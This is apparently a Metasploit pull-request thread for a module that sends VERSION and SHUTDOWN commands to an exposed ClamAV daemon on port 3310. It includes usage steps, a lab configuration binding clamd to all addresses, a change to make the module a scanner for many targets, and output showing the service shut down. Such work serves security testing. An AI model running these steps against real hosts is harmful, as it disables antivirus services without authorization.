Add ClamAV Remote Command Transmitter

[bwatters-r7]

What This Module Does

This module takes advantage of a possible misconfiguration in the ClamAV service on release 0.99.2. If the service is tied to a socket, the ClamAV service listens for commands on all addresses; this module connects to the ClamAV service port and sends the proper commands for VERSION and SHUTDOWN.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use auxiliary/admin/misc/clamav_control
• set rhost xxx.xxx.xxx.xxx
• set action VERSION
• run
• Verify It returns the correct version
• set action SHUTDOWN
• run
• Verify It shuts down the service
• set action VERSION
• run
• Verify It does not return a version (Should timeout)

[bwatters-r7]

@wvu-r7 can you add a little bit of a description on how to set up the ClamAV so it is vulnerable?

[wchen-r7]

If shutting down ClamAV is the intention, then I guess it should be print_good()?

[wvu]

Derp.

[nixawk]

ClamAV Lab Setup

debian / ubuntu

$ sudo apt-get install clamav clamav-daemon
$ sudo freshclam
$ sudo clamd --config-file=/etc/clamav/clamd.conf

If clamd fails to listen on port 3310, please add the following content in /etc/clamav/clamd.conf

# TCP port address.
# Default: no
TCPSocket 3310

# TCP address.
# By default we bind to INADDR_ANY, probably not wise.
# Enable the following to provide some degree of protection
# from the outside world.
# Default: no
TCPAddr 0.0.0.0

# Maximum length the queue of pending connections may grow to.
# Default: 15
MaxConnectionQueueLength 30

# Clamd uses FTP-like protocol to receive data from remote clients.
# If you are using clamav-milter to balance load between remote clamd daemons
# on firewall servers you may need to tune the options below.

# Close the connection when the data size limit is exceeded.
# The value should match your MTA's limit for a maximum attachment size.
# Default: 10M
StreamMaxLength 55M

# Limit port range.
# Default: 1024
#StreamMinPort 30000
# Default: 2048
#StreamMaxPort 32000

# Maximum number of threads running at the same time.
# Default: 10
MaxThreads 50

# Waiting for data from a client socket will timeout after this time (seconds).
# Value of 0 disables the timeout.
# Default: 120
ReadTimeout 300

# Waiting for a new job will timeout after this time (seconds).
# Default: 30
#IdleTimeout 60

# Maximum depth directories are scanned at.
# Default: 15
#MaxDirectoryRecursion 20

[bwatters-r7]

Thanks, @wchen-r7, @join-us; great points!
I added the suggested user documentation and changed that print statement.
Then, I realized I screwed up my tests...... so....... fixed that, too.
Please let me know if you notice anything else.

[jhart-r7]

It would be great to see this utilize Msf::Auxiliary::Scanner so you can more easily run this against larger swaths of targets without additional work.

[bwatters-r7]

@jhart-r7 Thanks for the suggestion to make it a scanner! New version is now a scanner.

[wchen-r7]

@join-us I'm trying to set up the box on Ubuntu, but I'm getting this:

$ sudo clamd --config-file=/etc/clamav/clamd.conf
ERROR: initgroups() failed

Any suggestions?

[wchen-r7]

@join-us Never mind. I did this instead:

sudo /etc/init.d/clamav-daemon start

[wchen-r7]

Verified:

msf auxiliary(clamav_control) > run

[+] 192.168.1.203:3310    - ClamAV 0.98.7/21772/Wed Jun 22 12:54:15 2016

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(clamav_control) > 
...
msf auxiliary(clamav_control) > run

[+] 192.168.1.203:3310    - Successfully shut down ClamAV Service
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(clamav_control) > set action VERSION
action => VERSION
msf auxiliary(clamav_control) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(clamav_control) >

[wvu]

Congrats on your first module, @bwatters-r7!! History has been made!